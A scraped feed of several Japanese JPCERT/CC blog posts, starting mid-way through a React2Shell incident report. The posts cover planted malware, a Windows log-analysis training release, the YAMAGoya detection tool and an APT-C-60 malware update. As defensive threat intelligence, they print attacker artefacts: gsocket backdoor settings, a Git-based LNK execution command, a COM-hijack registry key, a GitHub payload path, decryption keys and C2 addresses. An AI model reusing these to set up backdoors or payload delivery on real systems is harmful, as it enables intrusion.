class="mt-figure mt-figure-center"><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/react2shell-fig2-640wri.png" width="800" height="398" alt="" class="asset asset-image at-xid-1862911 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/><figcaption>図2：Google検索結果</figcaption></figure> <h3>設置されたマルウェア</h3> 今回の事案ではさまざまなマルウェアやオープンソースツールが悪用されていました。表2は設置されていたマルウェアの一覧です。（設定ファイルなどは除く） <table border="1" width="100%"> <caption>表2：設置されたマルウェア</caption> <thead> <tr> <th><div style="text-align: center;">項番</div></th> <th><div style="text-align: center;">ファイル名</div></th> <th><div style="text-align: center;">内容</div></th> </tr> </thead> <tbody> <tr> <td>1</td> <td>sex.sh</td> <td>xmrigのダウンロード用bashスクリプト</td> </tr> <tr> <td>2</td> <td>sex.sh.1</td> <td>xmrigのダウンロード用bashスクリプト</td> </tr> <tr> <td>3</td> <td>miner.sh</td> <td>xmrigの起動用bashスクリプト</td> </tr> <tr> <td>4</td> <td>xmrig</td> <td>xmrigコインマイナー</td> </tr> <tr> <td>5</td> <td>javax</td> <td>HISONICバックドア</td> </tr> <tr> <td>6</td> <td>javas</td> <td>SNOWLIGHTのダウンロード用bashスクリプト</td> </tr> <tr> <td>7</td> <td>rsyslo</td> <td>CrossC2 RAT</td> </tr> <tr> <td>8</td> <td>npm-cli</td> <td>Global Socket ツール</td> </tr> <tr> <td>9</td> <td>kernal</td> <td>削除されていたため詳細不明</td> </tr> </tbody> </table> 興味深い点として、一般的な金銭目的のコインマイナーの他に、UNC5174が利用すると言われているSNOWLIGHT<a href="#1">[1]</a>のダウンローダーや、UNC6603が利用すると言われているGolangで作成されたHISONICバックドア<a href="#2">[2]</a>、またSNOWLIGHTと同時刻に設置されていたLinux版のCobalt Strike実装であるCrossC2 RAT<a href="#3">[3]</a>などが確認されており、攻撃者の明確な目的は不明ですが、将来の攻撃基盤として悪用しようとしていた可能性も考えられます。 また、他のセキュリティベンダーの事例ではあまり見られないものとして、オープンソースツールであるGlobal Socket（gsocket）<a href="#4">[4]</a>の悪用も確認されました。本ツールは、NAT配下やファイアウォールなど直接到達できない2台の端末同士でも、中継ネットワークであるGSRN（Global Socket Relay Network）を介して接続を行えるようにするためのツールです。特徴として、同一の事前共有鍵を持っている端末間で通信できる仕組みになっており、通信はエンドツーエンドで暗号化され、GSRNは暗号化されたトラフィックだけを中継します。 今回、攻撃者は実行時に以下のような環境変数とオプションを指定しており、npm-cli.datを秘密ファイルとして使用し、主にDNS通信で利用される53番ポートで外部からbash経由で操作できるようにバックドアとして悪用していました。 <pre> GS_PORT='53' SHELL=/bin/bash TERM=xterm-256color GS_ARGS="-k /home/***/.config/dbus/npm-cli.dat -liqD" </pre> <h3>おわりに</h3> 今回のReact2Shellの脆弱性は公表されてから攻撃ツールの中に迅速に組み込まれ、わずか数日で多くのアクターによって悪用されている状況が観測されました。攻撃者によって脆弱性を悪用される速度は非常に早く、重大な脆弱性が公表された場合には早急な影響範囲の確認とパッチ適用などの対処が重要です。 また、悪用が確認されている脆弱性の対応を行う際にはパッチ適用とあわせて侵害有無の確認が必要です。今回の事案のように目に見えるサイト改ざん以外により深刻な侵害を受けている可能性も考えられるため、他に影響を受けている箇所がないかを慎重に調査いただくことを推奨します。 なお、今回紹介したマルウェアの通信先などについては、Appendixに記載していますのでご確認ください。 インシデントレスポンスグループ喜野孝太、矢野雄紀 <h3>参考情報</h3> <a name="1"></a>[1] UNC5174のWindows版マルウェアSNOWLIGHT <a href="https://sect.iij.ad.jp/blog/2025/11/unc5174-windows-snowlight-in-2025/" target="_blank" rel="noopener">https://sect.iij.ad.jp/blog/2025/11/unc5174-windows-snowlight-in-2025/</a> <a name="2"></a>[2] Multiple Threat Actors Exploit React2Shell (CVE-2025-55182) <a href="https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182" target="_blank" rel="noopener">https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182</a> <a name="3"></a>[3] Cobalt Strike Beaconの機能をクロスプラットフォームへと拡張するツール「CrossC2」を使った攻撃 <a href="https://blogs.jpcert.or.jp/ja/2025/08/crossc2.html" target="_blank" rel="noopener">https://blogs.jpcert.or.jp/ja/2025/08/crossc2.html</a> <a name="4"></a>[4] Global Socket <a href="https://github.com/hackerschoice/gsocket" target="_blank" rel="noopener">https://github.com/hackerschoice/gsocket</a> <h4>Appendix A：通信先</h4> <table border="1" width="100%"> <thead> <tr> <th><div style="text-align: center;">項番</div></th> <th><div style="text-align: center;">通信先</div></th> <th><div style="text-align: center;">用途</div></th> </tr> </thead> <tbody> <tr> <td>1</td> <td>45.143.131[.]123:59999</td> <td>SNOWLIGHTのダウンロード元／C2サーバー</td> </tr> <tr> <td>2</td> <td>154.89.152[.]240:443</td> <td>CrossC2のC2サーバー</td> </tr> </tbody> </table> <h4>Appendix B：マルウェアのハッシュ値</h4> <table border="1" width="100%"> <thead> <tr> <th><div style="text-align: center;">項番</div></th> <th><div style="text-align: center;">ハッシュ値（SHA-256）</div></th> <th><div style="text-align: center;">ファイル名</div></th> </tr> </thead> <tbody> <tr> <td>1</td> <td>5bae25736a09de5f4a0f9761d2b7bfa81ca8dba39de2a724473c9d021a65daa9</td> <td>sex.sh</td> </tr> <tr> <td>2</td> <td>ba43e447e63611d365300bf2e8e43ccb02ea112778d0d555ef9a9ccf6169808b</td> <td>sex.sh</td> </tr> <tr> <td>3</td> <td>ac3e12fa0aa4d6e4eed322e81ecf708a8c9bea29247ae6b26cc39d3b3a6c2fb8</td> <td>miner.sh</td> </tr> <tr> <td>4</td> <td>a536d755313ce550a510137211eca6171f636fb316026e9df8523c496c8fcd12</td> <td>xmrig</td> </tr> <tr> <td>5</td> <td>0c748b9e8bc6b5b4fe989df67655f3301d28ef81617b9cbe8e0f6a19d4f9b657</td> <td>xmrig</td> </tr> <tr> <td>6</td> <td>1a1edbea47162b1aa844252fcd4fb97f2a67faec1993e7819efc6a04b7c15552</td> <td>javax</td> </tr> <tr> <td>7</td> <td>0d07a974993221305ca7af139b73d9de1dcd992f553215e4f041e830a2d82729</td> <td>javas</td> </tr> <tr> <td>8</td> <td>5baa52387daedea5e3e00adf96ecacb4a2cdc98100664f29ac86e8e4a423baaf</td> <td>54ad0ee3tcp</td> </tr> <tr> <td>9</td> <td>c1a9cfc62626118bd9f54e401fd52ecd2d766a5e8a69dbc7db909ea5c987fcc0</td> <td>54ad0ee3tcp</td> </tr> <tr> <td>10</td> <td>4a74676bd00250d9b905b95c75c067369e3911cdf3141f947de517f58fc9f85c</td> <td>rsyslo</td> </tr> <tr> <td>11</td> <td>cb5f62bf7b591e69bd38e6bf8e40e8d307d154b2935703422d44f02e403d2e78</td> <td>npm-cli</td> </tr> </tbody> </table>
Windowsのイベントログ分析トレーニング用コンテンツの公開

Tue, 10 Feb 2026 02:00:00 -0000

はじめに JPCERT/CCは、標的型攻撃によってセキュリティインシデント（以下...

 <h3>はじめに</h3> JPCERT/CCは、標的型攻撃によってセキュリティインシデント（以下「インシデント」）が発生した際の調査手法に関するトレーニングコンテンツ資料（以下「本コンテンツ」）を公開しました。実際のインシデントにおいて、外部に公開している機器の脆弱性や設定不備を突かれることによって内部ネットワークに侵入され、最終的にActive Directoryの管理者権限を侵害されるといった手法が増加しています。このことから、本コンテンツはActive Directoryに注目したトレーニングコンテンツとして作成しました。 ログ分析トレーニングバージョン2 <a href=" https://github.com/JPCERTCC/log-analysis-training_v2/">https://github.com/JPCERTCC/log-analysis-training_v2/</a> なお、本コンテンツは三井物産セキュアディレクション株式会社の協力によって制作しました。 <h3>トレーニングコンテンツの概要</h3> インシデント対応は、検知 → 初動調査 → 一時対処 → 本格調査 → 報告 → 恒久対策という流れで行われることが多く、本コンテンツは初動調査に特化しています。基礎編と実践編で構成しており、基礎編で習得できる内容は次のとおりです。 <ul> <li>一般的な社内ネットワークの構成</li> <li>Directory Service</li> <li>Active Directory</li> <li>ドメインコントローラー</li> <li>ドメインとフォレスト</li> <li>ADにおける認証／認可</li> <li>Kerberos認証</li> <li>NTLM認証</li> <li>リモート認証とローカル認証</li> <li>グループポリシーオブジェクト</li> <li>攻撃者のネットワーク侵入手法</li> <li>Pass-the-Hash</li> <li>Pass-the-Ticket</li> <li>NTDSダンプ</li> <li>Kerberoast（Kerberoasting攻撃）</li> <li>NTLMリレー攻撃</li> <li>イベントビューアーの見方</li> </ul> <h3>トレーニングコンテンツの詳細</h3> 本コンテンツでは基本的なドメインコントローラーの説明からActive Directoryにおける認証、認可の解説などを行っており、インシデント調査、分析に関する基礎的な知識の習得が可能です。 <img class="asset asset-image at-xid-4014994 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B7%E3%83%A7%E3%83%83%E3%83%88-2026-01-21-092857-320wri.png" alt="" width="320" height="180"> <img class="asset asset-image at-xid-4014961 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B7%E3%83%A7%E3%83%83%E3%83%88-2026-01-21-092927-320wri.png" alt="" width="320" height="180"> 加えて、標的型攻撃において攻撃者が行うネットワーク侵入の手法や、その手法に対して必要なWindowsのイベントログの調査手法を学習することができます。 <img class="asset asset-image at-xid-4015076 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B7%E3%83%A7%E3%83%83%E3%83%88-2026-01-21-093223-320wri.png" alt="" width="320" height="180"> <img class="asset asset-image at-xid-4015078 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B7%E3%83%A7%E3%83%83%E3%83%88-2026-01-21-093252-320wri.png" alt="" width="320" height="180"> 実践編は、基礎編で学習した内容をもとに、シナリオをベースにイベントビューアーでWindowsイベントログを分析して攻撃のタイムラインを構築するトレーニングとして活用できる内容になっています。 <img class="asset asset-image at-xid-4015079 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B7%E3%83%A7%E3%83%83%E3%83%88-2026-01-21-093642-320wri.png" alt="" width="320" height="180"> <h3 class="MsoNormal">さいごに</h3> 本コンテンツは、Windowsイベントログをイベントビューアーで分析する内容です。実際のインシデントではログ自体が膨大であったり、ログ同士の関連を調査するにあたってはイベントビューアーでの分析だけでは難しかったりするため、イベントビューアー以外の分析方法も普段からトレーニングしておくことで、実際の調査をスムーズにすることができます。 なお、JPCERT/CCではこうした実際のインシデント発生時のWindowsイベントログの分析をサポートするツール「LogonTracer」をリリースしています。 LogonTracer <a href="https://github.com/JPCERTCC/LogonTracer">https://github.com/JPCERTCC/LogonTracer</a> 平時にこのようなツールを利用したWindowsイベントログの調査手法を確立し、インシデント調査の演習を行うことで、実際のインシデントが発生した場合に備えていただくことを推奨します。
SigmaおよびYARAルールを活用したリアルタイムクライアント監視ツールYAMAGoya

Tue, 18 Nov 2025 02:00:00 -0000

近年、ファイルレスマルウェアやマルウェアの難読化により、ファイル単体のスキャンだ...

近年、ファイルレスマルウェアやマルウェアの難読化により、ファイル単体のスキャンだけでは不審なアクティビティを検知することが難しくなっています。そのような脅威に対抗するために、セキュリティ研究者やマルウェアアナリストは、SigmaやYARAなどのルールを積極的に作成し、公開しています。しかし、既存のエンドポイントセキュリティツールでは、独自の検知エンジンを用いているため、SigmaやYARAを直接活用できる製品が不足しているのが現状です。この課題に対し、オープンソースのスレットハンティングツールYAMAGoyaを公開しました。YAMAGoyaは、次のGitHubレポジトリで公開していますので、ご自由にお使いください。 GitHub JPCERTCC/YAMAGoya：<a href="https://github.com/JPCERTCC/YAMAGoya" title="YAMAGoya" target="_blank">https://github.com/JPCERTCC/YAMAGoya</a> <figure class="mt-figure mt-figure-center"><a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/yamagoya-fig1.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/yamagoya-fig1-640wri.png" width="640" height="424" alt="YAMAGoyaの起動画面" class="asset asset-image at-xid-3934285 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></a><figcaption>図1：YAMAGoyaの起動画面</figcaption></figure> 以降では、YAMAGoyaのコンセプトや使用方法について紹介します。 <h3>YAMAGoyaのコンセプト</h3> YAMAGoyaは、ETW（Event Tracing for Windows）のイベント監視とメモリスキャンをあわせて脅威の検知を行えるように設計しています。以下は、本ツールの特徴です。 <ul> <li>ユーザーランドのみで動作：カーネルドライバー不要で導入容易</li> <li>リアルタイム監視：ファイル／プロセス／レジストリ／DNS／ネットワーク／PowerShell／WMI等をETW経由でリアルタイム監視可能</li> <li>複数のルール形式をサポート：Sigmaおよび相関分析に活用できるオリジナルYAMLルールをサポート</li> <li>メモリスキャン：ファイルレスやパッキングされたマルウェアをYARAルールで検知</li> <li>GUI／CLIサポート：GUIからの使用だけではなくコマンドラインによる自動化なども可能</li> </ul> <h3>導入方法</h3> <h4>バイナリ入手</h4> すぐに評価したい場合は、<a href="https://github.com/JPCERTCC/YAMAGoya/releases" title="GitHubレポジトリのReleases" target="_blank">GitHubレポジトリのReleases</a>からバイナリを取得できます。 <h4>ビルド</h4> ソースコードからビルドする場合は、<a href="https://github.com/JPCERTCC/YAMAGoya/blob/main/README_jp.md" title="YAMAGoya_README" target="_blank">README</a>をご覧ください。 <h3>使い方</h3> YAMAGoyaは、GUIおよびCLIで使用することが可能です。コマンドラインからオプションなしで実行するか、ダブルクリックで実行することでGUIが起動します。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> # GUIの実行 > YAMAGoya.exe </pre> 本ツールは、管理者権限で実行する必要があります（ETWセッションを起動するため）。ツールを実行する際は、右クリックから「管理者として実行」を選択するか、コマンドプロンプトを管理者として実行するようにしてください。 コマンドラインからは、次のように実行することで利用可能です。その他のオプションについては、オプションhelpで確認してください。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> # Sigmaルールで監視 > YAMAGoya.exe --session --sigma "C:\Rules\Sigma" --all </pre> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> # YARAルールでメモリスキャン > YAMAGoya.exe --session --yara "C:\Rules\YARA" --all </pre> <h3>YAMAGoyaのサポートルール</h3> YAMAGoyaは、SigmaルールおよびYARAルールをサポートしていますので、公開されているルールなどを活用してください。Sigmaルールに関しては、サポートするカテゴリーがWindows OSを対象とするものに限られています。詳しくは、<a href="https://github.com/JPCERTCC/YAMAGoya/blob/main/README_jp.md#sigma%25E3%2581%258B%25E3%2582%2589etw%25E3%2581%25B8%25E3%2581%25AE%25E3%2583%259E%25E3%2583%2583%25E3%2583%2594%25E3%2583%25B3%25E3%2582%25B0" title="YAMAGoya_README" target="_blank">README</a>をご覧ください。 本ツールでは、SigmaルールおよびYARAルール以外にもオリジナルYAMLルールをサポートしています。以下では、オリジナルYAMLルールの書き方について紹介します。 <h4>オリジナルYAMLルールの書き方</h4> オリジナルYAMLルールを作成するには、以下のスキーマに従ってください。各ルールファイルには以下を含める必要があります： <pre style='padding: 10px 10px;color:#1a1a1a;background:#f5f0f0;overflow: auto;white-space: pre'> - rulename: ルールの一意の名前 - description: ルールが検知する内容の説明 - rules: ルール項目のリスト。各項目には以下を含める必要があります： - ruletype: ルールの種類（例：regex、binary） - target: マッチするイベントカテゴリー - rule: マッチするパターンまたは値（正規表現ルールの場合は有効な正規表現） </pre> targetのカテゴリーには表1のものを使用できます。 <table> <thead> <caption>表1：target一覧</caption> <tr> <td style="background-color: #bdbdbd; width: 100px; text-align: center;">target名</td> <td style="background-color: #bdbdbd; width: 400px; text-align: center;">説明</td> </tr> </thead> <tbody> <tr> <td>file</td> <td>ファイル作成イベント</td> </tr> <tr> <td>delfile</td> <td>ファイル削除イベント</td> </tr> <tr> <td>process</td> <td>プロセスイベント</td> </tr> <tr> <td>open</td> <td>OpenProcess</td> </tr> <tr> <td>load</td> <td>DLL読み込みイベント</td> </tr> <tr> <td>registry</td> <td>レジストリイベント</td> </tr> <tr> <td>dns</td> <td>DNSイベント</td> </tr> <tr> <td>ipv4</td> <td>IPv4ネットワークイベント</td> </tr> <tr> <td>ipv6</td> <td>IPv6ネットワークイベント</td> </tr> <tr> <td>shell</td> <td>シェル関連イベント（RunKey、ショートカット）</td> </tr> <tr> <td>powershell</td> <td>PowerShell実行イベント</td> </tr> <tr> <td>wmi</td> <td>WMIコマンド実行イベント</td> </tr> </tbody> </table> デフォルトでは、1ファイルに記述したすべてのruleが10秒以内に確認された場合に、アラートが上がります。例えば、次のようなファイルの作成、プロセスの実行、DLLのロード、通信をしている場合にマルウェアとして検知することができるルールを記述することができます。オリジナルYAMLルールは、このような複数のアクティビティを相関的に確認して検知したい場合に有効です。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> rulename: "ANEL" description: "Detects ANEL from maldoc type" rules: - ruletype: "regex" target: "file" rule: "Tmp\\.docx$" - ruletype: "regex" target: "process" rule: "ScnCfg32\\.Exe$" - ruletype: "regex" target: "dll" rule: "vsodscpl\\.dll$" - ruletype: "regex" target: "file" rule: "TCDolW0p\\.log$" - ruletype: "ipv4" target: "ipv4" rule: "45.32.116.146" </pre> <h3>ログの確認</h3> GUIで使用する場合は、アラートタブでログを確認することができます。また、図2のアラートタブのOpen Log Fileから、テキストログを確認することもできます。 <figure class="mt-figure mt-figure-center"><a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/yamagoya-fig2.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/yamagoya-fig2-640wri.png" width="640" height="423" alt="YAMAGoyaのアラートタブ" class="asset asset-image at-xid-3934286 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></a><figcaption>図2：YAMAGoyaのアラートタブ</figcaption></figure> さらに、イベントログ（Application）にもアラートは保存されます。表2は、YAMAGoyaが記録するイベントID一覧です。 <table> <thead> <caption>表2：YAMAGoyaが記録するイベントログID一覧（Application）</caption> <tr> <td style="background-color:#bdbdbd; width:100px; text-align:center;">イベントID</td> <td style="background-color:#bdbdbd; text-align:center;">主なトリガー条件</td> </tr> </thead> <tbody> <tr> <td style="text-align:center;">8001</td> <td>オリジナルYAMLルールでの検知</td> </tr> <tr> <td style="text-align:center;">8002</td> <td>オリジナルYAMLルールの一部要素がマッチ（デバッグメッセージ）</td> </tr> <tr> <td style="text-align:center;">8003</td> <td>オリジナルYAMLルールで検知したプロセスの停止（Killモードの動作時）</td> </tr> <tr> <td style="text-align:center;">8005</td> <td>WinRM アウトバウンド通信</td> </tr> <tr> <td style="text-align:center;">8006</td> <td>WinRM インバウンド通信</td> </tr> <tr> <td style="text-align:center;">8008</td> <td>Security Mitigationsイベント</td> </tr> <tr> <td style="text-align:center;">8009</td> <td>Security Adminlessイベント検知</td> </tr> <tr> <td style="text-align:center;">8011</td> <td>Security CVEイベント検知</td> </tr> <tr> <td style="text-align:center;">8012</td> <td>SMBサーバー認証検知</td> </tr> <tr> <td style="text-align:center;">8013</td> <td>SMBサーバーファイルシェア検知</td> </tr> <tr> <td style="text-align:center;">8014</td> <td>SMBサーバーファイルシェアの追加検知</td> </tr> <tr> <td style="text-align:center;">8015</td> <td>SMBクライアント接続失敗</td> </tr> <tr> <td style="text-align:center;">8016</td> <td>SMBクライアントファイル転送</td> </tr> <tr> <td style="text-align:center;">8017</td> <td>ETWセッションのスタート</td> </tr> <tr> <td style="text-align:center;">8018</td> <td>ETWセッションの停止</td> </tr> <tr> <td style="text-align:center;">9001</td> <td>Sigmaルールでの検知</td> </tr> <tr> <td style="text-align:center;">9002</td> <td>Sigmaルールで検知したプロセスの停止（Killモードの動作時）</td> </tr> </tbody> </table> <figure class="mt-figure mt-figure-center"><a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/yamagoya-fig3.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/yamagoya-fig3-640wri.png" width="640" height="302" alt="イベントログに記録されたYAMAGoyaのアラート" class="asset asset-image at-xid-3934287 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></a><figcaption>図3：イベントログに記録されたYAMAGoyaのアラート</figcaption></figure> <h3>おわりに</h3> YAMAGoyaは、SigmaやYARAなどの公開されているシグネチャを利用可能なため、セキュリティコミュニティーのノウハウをセキュリティ対策に活用できるツールです。スレットハンティングやインシデントレスポンスなどの際にご活用ください。本ツールに関してPull Requestや要望などお待ちしています。 <h4>FAQ（よくある質問）</h4> <h5>Q1. YAMAGoyaは従来型ウイルス対策ソフトの代わりになりますか？</h5> A. いいえ。YAMAGoyaはウイルス対策ソフトを置き換えるものではなく、補完するツールです。デフォルトで検知ルールはないため、利用する際は検知ルールの収集・作成から行う必要があります。 <h5>Q2. 常駐（バックグラウンド実行）はできますか？</h5> A. はい。システムトレイに常駐し、バックグラウンドで監視できます。設定したルールに基づき、検知があれば通知／ログ出力します。 <h5>Q3. 既存のSIEMと連携できますか？</h5> A. はい。YAMAGoyaはログをテキストとイベントログ（Application）に出力します。これらをログ収集エージェントや転送機能で送れば、SplunkなどのSIEMに取り込めます。 <h5>Q4. ETWバイパス（回避手法）への対策に制限はありますか？</h5> A. はい。現時点でETWバイパスへの専用対策は未実装です。高度な攻撃者がETWを無効化・改ざんして検知を回避する可能性があります。EDRや他の監視ツールと併用して多層防御を構成することを推奨します。
攻撃グループAPT-C-60による攻撃のアップデート

Mon, 27 Oct 2025 01:30:00 -0000

以前のJPCERT/CC Eyesで、正規サービスを悪用した攻撃グループAPT-...

以前のJPCERT/CC Eyesで、<a href="https://blogs.jpcert.or.jp/ja/2024/11/APT-C-60.html" target="_blank">正規サービスを悪用した攻撃グループAPT-C-60による攻撃</a>について紹介しましたが、JPCERT/CCでは引き続き同様の攻撃活動を国内で確認しています。今回は、2025年6月から8月にかけて確認した攻撃について、前回からのアップデートを中心に以下の項目について解説します。 <ul> <li>攻撃の流れ</li> <li>ダウンローダーおよびSpyGlaceのアップデート</li> <li>SpyGlaceのエンコード関数、通信方式</li> <li>使用されたデコイ文章</li> <li>GitHubリポジトリの分析</li> </ul> <h3>攻撃の流れ</h3> JPCERT/CCが確認した攻撃は、2024年8月ごろに発生した攻撃と同様に、求職者を装い組織の採用担当に宛てた標的型攻撃メールでした。攻撃の流れを図1に示します。昨年の攻撃ではGoogle DriveからVHDXファイルをダウンロードさせる方式が使用されていましたが、今回の攻撃では悪性のVHDXファイルが直接添付ファイルとして送られていました。メールの受信者がVHDXファイル内に含まれているLNKファイルをクリックすることで、正規ファイルであるGit経由で悪性のスクリプトが動作します。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/aptc60update01-800wri.png" width="800" height="449" alt="" class="asset asset-image at-xid-3922463 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <div style="text-align: center;"> 図1：マルウェア感染の流れ </div> LNKファイルによって次に示すgcmd.exe（Gitの正規ファイル）が実行され、VHDXファイル内に格納されているスクリプトのglog.txtが動作します。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> P:\LICENSES.LOG\mingw64\bin\gcmd.exe "cd .\LICENSES.LOG\mingw64\bin && type glog.txt | gcmd.exe" && exit </pre> Gitによって実行されるスクリプトはデコイ文書の表示、ファイルの作成、実行を担い、作成されたWebClassUser.dat（以降Downloader1と表示）は次に示すレジストリへ登録され、COMハイジャッキングによって永続化および実行されます。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> HKCU\Software\Classes\CLSID\{566296fe-e0e8-475f-ba9c-a31ad31620b1}\InProcServer32 </pre> <h3>DownLoader1およびDownLoader2のアップデート</h3> 攻撃者による被害端末の把握を目的として、Downloader1はstatcounterという正規の統計サービスに対して一定間隔で通信を行います。そのリクエストヘッダーは次のフォーマットで作成されます。以前のバージョンと比較し、ボリュームシリアル番号とコンピュータ名を使用して被害端末を識別している点が異なります。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> Referer: ONLINE=>[Number1],[Number2] >> [%userprofile%] / [VolumeSerialNumber + ComputerName] </pre> また、Downloader1はボリュームシリアル番号とコンピュータ名によるファイル名と検体内に含まれているURLを組み合わせ、次のフォーマットのパスを作成し、通信を行います。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> https://raw.githubusercontent.com/carolab989/class2025/refs/heads/main/[VolumeSerialNumber + ComputerName].txt </pre> 攻撃者がstatcounterへ通信されたリファラの値を確認し、その被害端末に対応した"[VolumeSerialNumber + ComputerName].txt"をGitHubへアップロードするとDownLoader1がそのファイルを取得します。その取得したファイルに記載されているURLを元に次のDownloader2のダウンロードおよび実行が行われます。さらに、"[VolumeSerialNumber + ComputerName].txt"にはダウンロード先URLを指定するだけでなく、表1のコマンドを実行することが可能です。例えば、"1*"の場合、statcounter.comへGETリクエストを送る間隔をデフォルトの1時間から6時間へ変更することが可能になり、攻撃者による被害者環境のチェックをより慎重に行う意図がうかがえます。 <div style="text-align: center;"> 表1 ダウンローダーのコマンド </div> <table> <thead> <tr> <th>Command</th> <th>Contents</th> </tr> </thead> <tbody> <tr> <td>"1*"</td> <td>Change the interval settings</td> </tr> <tr> <td>"0" or "40"</td> <td>Reset the interval settings</td> </tr> <tr> <td>"http*"</td> <td>Download DLL</td> </tr> </tbody> </table> なお、以前のバージョンと同様に取得したファイルは"sgznqhtgnghvmzxponum"を鍵としたXORデコード後に実行されます。 DownLoader2はSpyGlaceおよびそのローダーをダウンロードし、実行する機能を持っています。APIの動的解決手法にはADDとXORをベースとしたエンコード方式が使用されていますが、以前のバージョンから値が変更されており、add 0x04した後、XOR 0x05する方式となっています。なお、SpyGlaceのLoaderについても同様のエンコード方式となっています。以前のバージョンと同様にDownLoader2が取得したファイルは"AadDDRTaSPtyAG57er#$ad!lDKTOPLTEL78pE"を鍵としたXORデコード後にCOMハイジャッキングによって実行されます。 <h3>SpyGlaceのアップデート</h3> JPCERT/CCではVersion 3.1.12、3.1.13、3.1.14の3つのバージョンのSpyGlaceを確認しています。2024年に確認したVersion 3.1.6と比較すると、コマンドprockillとproclistは何もしないよう変更されており、また、新しいコマンドuldが追加されています。コマンドuldはロードしたモジュールの特定の関数を呼び出した後、2秒後にアンロードする機能となっています。モジュールをアンロードする際、特定の関数を実行する必要があるモジュールの場合に本コマンドの機能が必要と考えられます。また、screenuploadコマンドでは、スクリーンショット関連モジュールと思われるファイルパスおよびExport関数名が次のパスへと変更されていることを確認しています。本モジュールClouds.db自体は未確認のためどのような機能かはわかりませんが、スクリーンショットコマンド関連のモジュールと考えられます。なお、実装されているコマンドの一覧はAppendix Dを参照ください。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> File path: %LocalAppData%\Microsoft\Windows\Clouds\Clouds.db Export Function: mssc1 </pre> 確認したVersion 3.1.12、3.1.13、3.1.14における差分はほとんどありませんが、それぞれMutexの値が異なる点や、これまで%public%\AccountPictures\Default\だった自動実行パスがVerison 3.1.14からは%appdata%\Microsoft\SystemCertificates\My\CPLsと変更されている点を確認しています。 なお、2025年9月にVersion3.1.14を使ったキャンペーンについて解説した記事<a href="#1">[1]</a>が公開されていますが、使用されたGitHubリポジトリなどは重複していないため、国外などで確認された別の攻撃キャンペーンと考えられます。 <h3>SpyGlaceのエンコード関数と通信方式の詳細</h3> SpyGlaceの特徴であるエンコード方式は1バイトのXORとSUB命令を組み合わせたものが使用されており、マルウェアが使用する文字列や動的なAPIの解決などに多用されています。また、SpyGlaceのコマンドの一つである"Download"コマンドでは暗号化されたファイルがダウンロードされますが、復号には次のKEYとIVを使用したAES128-CBCにて復号され、%temp%\wcts66889.tmpのファイルパスに作成されることを確認しています。ダウンロードコマンドのコードの一部を図2に示します。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> KEY: B0747C82C23359D1342B47A669796989 IV: 21A44712685A8BA42985783B67883999 </pre> <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/aptc60update02-800wri.png" width="800" height="598" alt="" class="asset asset-image at-xid-3905241 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <div style="text-align: center;"> 図2：ダウンロードコマンドのコードの一部 </div> SpyGlaceはC2サーバーとの通信にBASE64とRC4を使用しますが、その初期通信におけるリクエストヘッダーのフォーマットを次に示します。なお、a001の値に使用されるuseridである"GOLDBAR"という文字列はPositive Technologiesによる報告<a href="#2">[2]</a>や昨年の日本における攻撃の際に使用された文字列と同一であり、ターゲット地域やキャンペーンを指している可能性があります。また、エンコード方式について、少なくともVersion 3.1.6以降のSpyGlaceでは改変されたRC4が使用されています。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> a001=[md5("GOLDBAR")]&a002=[md5(systeminfo)]&a003=["uid" or "info"]&a004=[BASE64(CustomRC4([ComputerName;UserName;CpuInfo;OS Version;SpyGlace Version]))] </pre> 